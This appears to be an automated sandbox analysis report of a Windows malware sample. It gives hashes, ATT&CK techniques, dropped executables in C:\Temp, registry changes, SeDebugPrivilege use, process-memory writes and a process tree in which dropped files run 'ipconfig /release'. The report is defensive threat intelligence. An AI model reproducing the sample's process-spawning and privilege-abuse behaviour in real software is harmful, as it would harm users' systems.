9796b912b1396c5613d5e3ccd4eaaea626c2c1f44802612d56c495ca477201ab

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/09/2024, 07:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
Size

361KB
MD5

002cdb22d09eb3e1ddc00b1abc8e6cb6
SHA1

f45474194877dde14040352dfa88684f6d5d2edc
SHA256

9796b912b1396c5613d5e3ccd4eaaea626c2c1f44802612d56c495ca477201ab
SHA512

225d376f71ecee7d23593ba27f1caa0836819eb8490f37920c0f9bba6dd9bda7167fbd4881e6045aa0081c1369be57f49b2a08bce06df2191d5706789e16d811
SSDEEP

6144:WflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:WflfAsiVGjSGecvX

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
4868	wqoigaytqljdbvtn.exe
1012	CreateProcess.exe
4740	gdywqoigay.exe
1580	CreateProcess.exe
2588	CreateProcess.exe
788	i_gdywqoigay.exe
3124	CreateProcess.exe
4040	nlfdyvqoig.exe
4688	CreateProcess.exe
456	CreateProcess.exe
3836	i_nlfdyvqoig.exe
2228	CreateProcess.exe
1928	qnifaysqki.exe
4136	CreateProcess.exe
3536	CreateProcess.exe
4060	i_qnifaysqki.exe
4340	CreateProcess.exe
1148	kicavsnkfd.exe
1888	CreateProcess.exe
4380	CreateProcess.exe
2700	i_kicavsnkfd.exe
4828	CreateProcess.exe
3940	icausmkfcx.exe
1600	CreateProcess.exe
2868	CreateProcess.exe
1608	i_icausmkfcx.exe
1452	CreateProcess.exe
1476	zxrpjhbzur.exe
2864	CreateProcess.exe
3168	CreateProcess.exe
2108	i_zxrpjhbzur.exe
1572	CreateProcess.exe
2688	zwrpjhbzur.exe
4248	CreateProcess.exe
5080	CreateProcess.exe
4040	i_zwrpjhbzur.exe
2456	CreateProcess.exe
844	wrojhbztrl.exe
4496	CreateProcess.exe
2592	CreateProcess.exe
4984	i_wrojhbztrl.exe
5004	CreateProcess.exe
4704	qoigbytrlj.exe
4136	CreateProcess.exe
3800	CreateProcess.exe
4544	i_qoigbytrlj.exe
4340	CreateProcess.exe
1776	nlgdyvqoig.exe
2668	CreateProcess.exe
4944	CreateProcess.exe
1052	i_nlgdyvqoig.exe
3648	CreateProcess.exe
1504	vqnigaysql.exe
4692	CreateProcess.exe
1912	CreateProcess.exe
2152	i_vqnigaysql.exe
2476	CreateProcess.exe
4592	sqkicausnk.exe
728	CreateProcess.exe
4888	CreateProcess.exe
5028	i_sqkicausnk.exe
3176	CreateProcess.exe
4680	sqkicausnk.exe
1452	CreateProcess.exe

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wqoigaytqljdbvtn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zxrpjhbzur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_zxrpjhbzur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_xrpjhczusm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_tojgbytrlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qnifaysqki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icausmkfcx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qoigbytrlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vqnigaysql.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sqkicausnk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xrpjhczusm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ywqojgbztr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vpnifaysqk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CreateProcess.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nlfdyvqoig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_qnifaysqki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vqnigaysql.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_xupnhfzpjh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tojgbytrlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_vpnifaysqk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_gdywqoigay.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_nlfdyvqoig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wrojhbztrl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nlgdyvqoig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_zwrpjhbzur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_qoigbytrlj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_sqkicausnk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xupnhfzpjh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ytqljdbvtn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_trmjecwuom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ytqljdbvtn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kicavsnkfd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_kicavsnkfd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_icausmkfcx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zwrpjhbzur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_wrojhbztrl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_nlgdyvqoig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gdywqoigay.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sqkicausnk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trmjecwuom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i_ywqojgbztr.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2040	ipconfig.exe
4756	ipconfig.exe
2592	ipconfig.exe
1472	ipconfig.exe
2372	ipconfig.exe
4708	ipconfig.exe
4992	ipconfig.exe
4248	ipconfig.exe
4204	ipconfig.exe
4680	ipconfig.exe
3128	ipconfig.exe
3752	ipconfig.exe
3636	ipconfig.exe
1720	ipconfig.exe
1904	ipconfig.exe
2504	ipconfig.exe
772	ipconfig.exe
4212	ipconfig.exe
2960	ipconfig.exe
4420	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134474"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134474"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea125702b7698d479b1c3c8e0190d45f000000000200000000001066000000010000200000003842967b2f0a555cd5a397f7a291f87dd7fd99eadc883698b34ab7fec0590c65000000000e800000000200002000000005bfe2b439084f88a0857aea5d42a3e327a63bb26782b732d9eadb270021fbae20000000e5ca99d7280e9f9bad90609569884e71fd22201563fa326a84fcebe1ba442eb54000000082550958ada95f24147e65dcdc7407cdfc3bd5295717d38b8e80c944e58dfc9b2f8be9570e08ab89543df2894cd26eff379ee97af03a4fb8fe7bc0d83acfcee1	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3928972077"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 906fc5ea0a13db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3931628358"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea125702b7698d479b1c3c8e0190d45f000000000200000000001066000000010000200000005540336be2343824f83e7425eeda7e429e3f44104ac3108aee071954bb223947000000000e80000000020000200000009c87ae6a46a700c3aa9e0d75ee1f84187a27e705a9921d7583d0206bf35108d4200000001bcbaa2e07c57fa82d52720cc1fd227796c3f229ab7ce3c010a53215d2b7486040000000193a69d09f5208527c4c2c9c00b14b723f5b0a35d67e2311e035913d4ddc51862902f973baf423cfcbf8c490a7ef8aa8192fc75b17070c8d96951e7490590e35	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a043beea0a13db01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3928972077"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134474"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{15C5D0BE-7EFE-11EF-AC6B-62872261FF50} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434446497"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
4868	wqoigaytqljdbvtn.exe
4868	wqoigaytqljdbvtn.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	788	i_gdywqoigay.exe
Token: SeDebugPrivilege	3836	i_nlfdyvqoig.exe
Token: SeDebugPrivilege	4060	i_qnifaysqki.exe
Token: SeDebugPrivilege	2700	i_kicavsnkfd.exe
Token: SeDebugPrivilege	1608	i_icausmkfcx.exe
Token: SeDebugPrivilege	2108	i_zxrpjhbzur.exe
Token: SeDebugPrivilege	4040	i_zwrpjhbzur.exe
Token: SeDebugPrivilege	4984	i_wrojhbztrl.exe
Token: SeDebugPrivilege	4544	i_qoigbytrlj.exe
Token: SeDebugPrivilege	1052	i_nlgdyvqoig.exe
Token: SeDebugPrivilege	2152	i_vqnigaysql.exe
Token: SeDebugPrivilege	5028	i_sqkicausnk.exe
Token: SeDebugPrivilege	1884	i_sqkicausnk.exe
Token: SeDebugPrivilege	4000	i_xupnhfzpjh.exe
Token: SeDebugPrivilege	4176	i_xrpjhczusm.exe
Token: SeDebugPrivilege	3596	i_trmjecwuom.exe
Token: SeDebugPrivilege	3924	i_tojgbytrlj.exe
Token: SeDebugPrivilege	2752	i_ywqojgbztr.exe
Token: SeDebugPrivilege	1504	i_ytqljdbvtn.exe
Token: SeDebugPrivilege	3680	i_vpnifaysqk.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3612	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3612	iexplore.exe
3612	iexplore.exe
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 4868	3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe	82
PID 3672 wrote to memory of 4868	3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe	82
PID 3672 wrote to memory of 4868	3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe	82
PID 3672 wrote to memory of 3612	3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe	83
PID 3672 wrote to memory of 3612	3672	002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe	83
PID 3612 wrote to memory of 1552	3612	iexplore.exe	84
PID 3612 wrote to memory of 1552	3612	iexplore.exe	84
PID 3612 wrote to memory of 1552	3612	iexplore.exe	84
PID 4868 wrote to memory of 1012	4868	wqoigaytqljdbvtn.exe	85
PID 4868 wrote to memory of 1012	4868	wqoigaytqljdbvtn.exe	85
PID 4868 wrote to memory of 1012	4868	wqoigaytqljdbvtn.exe	85
PID 4740 wrote to memory of 1580	4740	gdywqoigay.exe	88
PID 4740 wrote to memory of 1580	4740	gdywqoigay.exe	88
PID 4740 wrote to memory of 1580	4740	gdywqoigay.exe	88
PID 4868 wrote to memory of 2588	4868	wqoigaytqljdbvtn.exe	95
PID 4868 wrote to memory of 2588	4868	wqoigaytqljdbvtn.exe	95
PID 4868 wrote to memory of 2588	4868	wqoigaytqljdbvtn.exe	95
PID 4868 wrote to memory of 3124	4868	wqoigaytqljdbvtn.exe	98
PID 4868 wrote to memory of 3124	4868	wqoigaytqljdbvtn.exe	98
PID 4868 wrote to memory of 3124	4868	wqoigaytqljdbvtn.exe	98
PID 4040 wrote to memory of 4688	4040	nlfdyvqoig.exe	100
PID 4040 wrote to memory of 4688	4040	nlfdyvqoig.exe	100
PID 4040 wrote to memory of 4688	4040	nlfdyvqoig.exe	100
PID 4868 wrote to memory of 456	4868	wqoigaytqljdbvtn.exe	105
PID 4868 wrote to memory of 456	4868	wqoigaytqljdbvtn.exe	105
PID 4868 wrote to memory of 456	4868	wqoigaytqljdbvtn.exe	105
PID 4868 wrote to memory of 2228	4868	wqoigaytqljdbvtn.exe	107
PID 4868 wrote to memory of 2228	4868	wqoigaytqljdbvtn.exe	107
PID 4868 wrote to memory of 2228	4868	wqoigaytqljdbvtn.exe	107
PID 1928 wrote to memory of 4136	1928	qnifaysqki.exe	109
PID 1928 wrote to memory of 4136	1928	qnifaysqki.exe	109
PID 1928 wrote to memory of 4136	1928	qnifaysqki.exe	109
PID 4868 wrote to memory of 3536	4868	wqoigaytqljdbvtn.exe	112
PID 4868 wrote to memory of 3536	4868	wqoigaytqljdbvtn.exe	112
PID 4868 wrote to memory of 3536	4868	wqoigaytqljdbvtn.exe	112
PID 4868 wrote to memory of 4340	4868	wqoigaytqljdbvtn.exe	114
PID 4868 wrote to memory of 4340	4868	wqoigaytqljdbvtn.exe	114
PID 4868 wrote to memory of 4340	4868	wqoigaytqljdbvtn.exe	114
PID 1148 wrote to memory of 1888	1148	kicavsnkfd.exe	116
PID 1148 wrote to memory of 1888	1148	kicavsnkfd.exe	116
PID 1148 wrote to memory of 1888	1148	kicavsnkfd.exe	116
PID 4868 wrote to memory of 4380	4868	wqoigaytqljdbvtn.exe	120
PID 4868 wrote to memory of 4380	4868	wqoigaytqljdbvtn.exe	120
PID 4868 wrote to memory of 4380	4868	wqoigaytqljdbvtn.exe	120
PID 4868 wrote to memory of 4828	4868	wqoigaytqljdbvtn.exe	123
PID 4868 wrote to memory of 4828	4868	wqoigaytqljdbvtn.exe	123
PID 4868 wrote to memory of 4828	4868	wqoigaytqljdbvtn.exe	123
PID 3940 wrote to memory of 1600	3940	icausmkfcx.exe	125
PID 3940 wrote to memory of 1600	3940	icausmkfcx.exe	125
PID 3940 wrote to memory of 1600	3940	icausmkfcx.exe	125
PID 4868 wrote to memory of 2868	4868	wqoigaytqljdbvtn.exe	128
PID 4868 wrote to memory of 2868	4868	wqoigaytqljdbvtn.exe	128
PID 4868 wrote to memory of 2868	4868	wqoigaytqljdbvtn.exe	128
PID 4868 wrote to memory of 1452	4868	wqoigaytqljdbvtn.exe	130
PID 4868 wrote to memory of 1452	4868	wqoigaytqljdbvtn.exe	130
PID 4868 wrote to memory of 1452	4868	wqoigaytqljdbvtn.exe	130
PID 1476 wrote to memory of 2864	1476	zxrpjhbzur.exe	132
PID 1476 wrote to memory of 2864	1476	zxrpjhbzur.exe	132
PID 1476 wrote to memory of 2864	1476	zxrpjhbzur.exe	132
PID 4868 wrote to memory of 3168	4868	wqoigaytqljdbvtn.exe	135
PID 4868 wrote to memory of 3168	4868	wqoigaytqljdbvtn.exe	135
PID 4868 wrote to memory of 3168	4868	wqoigaytqljdbvtn.exe	135
PID 4868 wrote to memory of 1572	4868	wqoigaytqljdbvtn.exe	137
PID 4868 wrote to memory of 1572	4868	wqoigaytqljdbvtn.exe	137

C:\Users\Admin\AppData\Local\Temp\002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\002cdb22d09eb3e1ddc00b1abc8e6cb6_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Temp\wqoigaytqljdbvtn.exe
  C:\Temp\wqoigaytqljdbvtn.exe run
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\gdywqoigay.exe ups_run
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1012
  - - C:\Temp\gdywqoigay.exe
      C:\Temp\gdywqoigay.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4740
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1580
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2504
- - C:\temp\CreateProcess.exe
